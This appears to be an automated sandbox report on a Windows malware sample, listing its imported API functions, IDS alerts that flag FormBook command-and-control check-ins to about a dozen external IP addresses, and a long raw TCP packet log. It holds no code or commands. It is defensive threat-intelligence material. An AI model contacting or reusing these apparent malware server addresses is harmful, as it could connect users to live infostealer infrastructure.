                                                                                                                      KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                                                                                                      USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                                                                                                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                      SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                                                                                                      ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                      Possible Origin

                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      EnglishUnited States

                                                                                                                      Network Behavior

                                                                                                                      Snort IDS Alerts

                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                      192.168.2.8144.217.103.349756802855465 12/07/23-13:45:53.892265TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975680192.168.2.8144.217.103.3
                                                                                                                      192.168.2.869.57.161.21549720802855465 12/07/23-13:43:25.108484TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972080192.168.2.869.57.161.215
                                                                                                                      192.168.2.864.190.62.2249732802855465 12/07/23-13:44:20.591294TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973280192.168.2.864.190.62.22
                                                                                                                      192.168.2.8173.231.241.13249716802855465 12/07/23-13:43:07.624786TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971680192.168.2.8173.231.241.132
                                                                                                                      192.168.2.8208.91.197.2749752802855465 12/07/23-13:45:31.302057TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975280192.168.2.8208.91.197.27
                                                                                                                      192.168.2.8162.240.81.1849740802855465 12/07/23-13:44:49.247971TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974080192.168.2.8162.240.81.18
                                                                                                                      192.168.2.884.32.84.3249707802855465 12/07/23-13:42:23.852123TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24970780192.168.2.884.32.84.32
                                                                                                                      192.168.2.8217.144.107.249728802855465 12/07/23-13:44:05.771412TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972880192.168.2.8217.144.107.2
                                                                                                                      192.168.2.884.32.84.3249748802855465 12/07/23-13:45:17.103098TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974880192.168.2.884.32.84.32
                                                                                                                      192.168.2.868.178.195.7149744802855465 12/07/23-13:45:02.926842TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974480192.168.2.868.178.195.71
                                                                                                                      192.168.2.8194.58.112.17449724802855465 12/07/23-13:43:39.597890TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972480192.168.2.8194.58.112.174
                                                                                                                      192.168.2.8207.244.126.15049736802855465 12/07/23-13:44:35.378384TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973680192.168.2.8207.244.126.150
                                                                                                                      192.168.2.8103.210.56.14149711802855465 12/07/23-13:42:53.053398TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971180192.168.2.8103.210.56.141

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 7, 2023 13:42:23.675410986 CET4970780192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:42:23.851284981 CET804970784.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:23.851402044 CET4970780192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:42:23.852123022 CET4970780192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:42:24.028326988 CET804970784.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:24.028580904 CET804970784.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:24.028650045 CET804970784.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:24.028770924 CET804970784.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:24.028825045 CET4970780192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:42:24.028846979 CET804970784.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:24.028889894 CET4970780192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:42:24.028917074 CET804970784.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:24.029000998 CET804970784.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:24.029043913 CET4970780192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:42:24.029098034 CET804970784.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:24.029159069 CET804970784.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:24.029179096 CET804970784.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:24.029200077 CET4970780192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:42:24.029232025 CET4970780192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:42:24.030253887 CET4970780192.168.2.884.32.84.32
                                                                                                                      Dec 7, 2023 13:42:24.206027985 CET804970784.32.84.32192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:42.956549883 CET4970880192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:43.397253990 CET8049708103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:43.397380114 CET4970880192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:43.398201942 CET4970880192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:43.805006027 CET8049708103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:44.553716898 CET8049708103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:44.553745985 CET8049708103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:44.553833961 CET4970880192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:44.556361914 CET8049708103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:44.556382895 CET8049708103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:44.556432009 CET4970880192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:44.558943033 CET8049708103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:44.575726032 CET8049708103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:44.575750113 CET8049708103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:44.575798988 CET4970880192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:44.585055113 CET8049708103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:44.585074902 CET8049708103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:44.585114956 CET4970880192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:44.587305069 CET8049708103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:44.587354898 CET4970880192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:44.909604073 CET4970880192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:44.960119963 CET8049708103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:44.960155964 CET8049708103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:44.960244894 CET4970880192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:44.960267067 CET4970880192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:45.925972939 CET4970980192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:46.331571102 CET8049709103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:46.331664085 CET4970980192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:47.189398050 CET4970980192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:47.595328093 CET8049709103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:48.690833092 CET4970980192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:49.136358023 CET8049709103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:49.352283955 CET8049709103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:49.352387905 CET8049709103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:49.352396965 CET4970980192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:49.352432013 CET4970980192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:49.356087923 CET8049709103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:49.356151104 CET4970980192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:49.356977940 CET8049709103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:49.357023954 CET4970980192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:49.357038021 CET8049709103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:49.357079983 CET4970980192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:49.374861002 CET8049709103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:49.374882936 CET8049709103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:49.374941111 CET4970980192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:49.374941111 CET4970980192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:49.381603003 CET8049709103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:49.381628990 CET8049709103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:49.381656885 CET4970980192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:49.381675005 CET4970980192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:49.383918047 CET8049709103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:49.383964062 CET4970980192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:49.706768990 CET4971080192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:50.113548994 CET8049710103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:50.113773108 CET4971080192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:50.122229099 CET4971080192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:50.528635979 CET8049710103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:50.528661966 CET8049710103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:51.628263950 CET4971080192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:51.943645000 CET8049710103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:51.943794966 CET8049710103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:51.943911076 CET4971080192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:51.944111109 CET4971080192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:51.946788073 CET8049710103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:51.946813107 CET8049710103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:51.946866989 CET4971080192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:51.946902037 CET4971080192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:51.949001074 CET8049710103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:51.949069023 CET4971080192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:51.965204954 CET8049710103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:51.965249062 CET8049710103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:51.965326071 CET4971080192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:51.968019962 CET4971080192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:51.972428083 CET8049710103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:51.972466946 CET8049710103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:51.972496033 CET4971080192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:51.972529888 CET4971080192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:51.973733902 CET8049710103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:51.973779917 CET4971080192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:52.034657955 CET8049710103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:52.034975052 CET4971080192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:52.644915104 CET4971180192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:53.053018093 CET8049711103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:53.053143024 CET4971180192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:53.053397894 CET4971180192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:53.461649895 CET8049711103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:54.192111969 CET8049711103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:54.192141056 CET8049711103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:54.192344904 CET4971180192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:54.192537069 CET4971180192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:55.065505028 CET8049711103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:55.065689087 CET4971180192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:55.190628052 CET4971180192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:57.190618038 CET4971180192.168.2.8103.210.56.141
                                                                                                                      Dec 7, 2023 13:42:57.597151041 CET8049711103.210.56.141192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:59.447810888 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:42:59.598661900 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:42:59.598898888 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:42:59.599157095 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:42:59.749980927 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:01.112714052 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:01.303152084 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.128683090 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.280416965 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.280596018 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.280976057 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.403894901 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.403976917 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.432389021 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.462188005 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.462392092 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.516972065 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.516997099 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.517035961 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.517107964 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.517122984 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.517173052 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.517173052 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.517173052 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.517198086 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.517218113 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.517224073 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.517237902 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.517256021 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:02.517333031 CET8049713173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:02.517369032 CET4971380192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:03.784569025 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:03.975569963 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:04.800529957 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:04.951471090 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:04.951705933 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:04.952063084 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.103254080 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.103312969 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.393357038 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.393379927 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.393467903 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.393611908 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.393858910 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.393858910 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.456545115 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.456645012 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.458424091 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.458472013 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.458484888 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.458513975 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.458542109 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.458580971 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.458600044 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.458640099 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.458668947 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.458709002 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:05.458714008 CET8049714173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:05.458755016 CET4971480192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.392672062 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.392689943 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.392869949 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.416621923 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.418684006 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.418699980 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.418751001 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.418826103 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.418838978 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.418850899 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.418863058 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.418865919 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.418875933 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.418915987 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.418929100 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.456338882 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.545614004 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.545640945 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.545733929 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.545747995 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.545773029 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.545788050 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.545814991 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.571490049 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.571573973 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.571613073 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.571640968 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.571743965 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.571758986 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.571795940 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.572577953 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.572616100 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.572761059 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.572813988 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.572930098 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.572962999 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.573110104 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.573122025 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.573133945 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.573142052 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.573164940 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.573297977 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.573311090 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.573334932 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.573363066 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.573479891 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.573492050 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.573513985 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.573529959 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.573537111 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.573574066 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:06.573730946 CET8049715173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:06.573765039 CET4971580192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:07.472419024 CET4971680192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:07.624366999 CET8049716173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:07.624517918 CET4971680192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:07.624785900 CET4971680192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:07.776628017 CET8049716173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:11.453655958 CET8049716173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:11.494385004 CET8049716173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:11.494549990 CET8049716173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:11.494580030 CET4971680192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:11.494736910 CET4971680192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:11.494813919 CET4971680192.168.2.8173.231.241.132
                                                                                                                      Dec 7, 2023 13:43:11.646291018 CET8049716173.231.241.132192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:16.748989105 CET4971780192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:16.946090937 CET804971769.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:16.946254015 CET4971780192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:16.946492910 CET4971780192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:17.142756939 CET804971769.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:17.232382059 CET804971769.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:17.232449055 CET804971769.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:17.232513905 CET4971780192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:18.456422091 CET4971780192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:19.472553968 CET4971880192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:19.669651031 CET804971869.57.161.215192.168.2.8
                                                                                                                      Dec 7, 2023 13:43:19.669878006 CET4971880192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:19.670157909 CET4971880192.168.2.869.57.161.215
                                                                                                                      Dec 7, 2023 13:43:19.868004084 CET804971869.57.161.215192.168.2.8
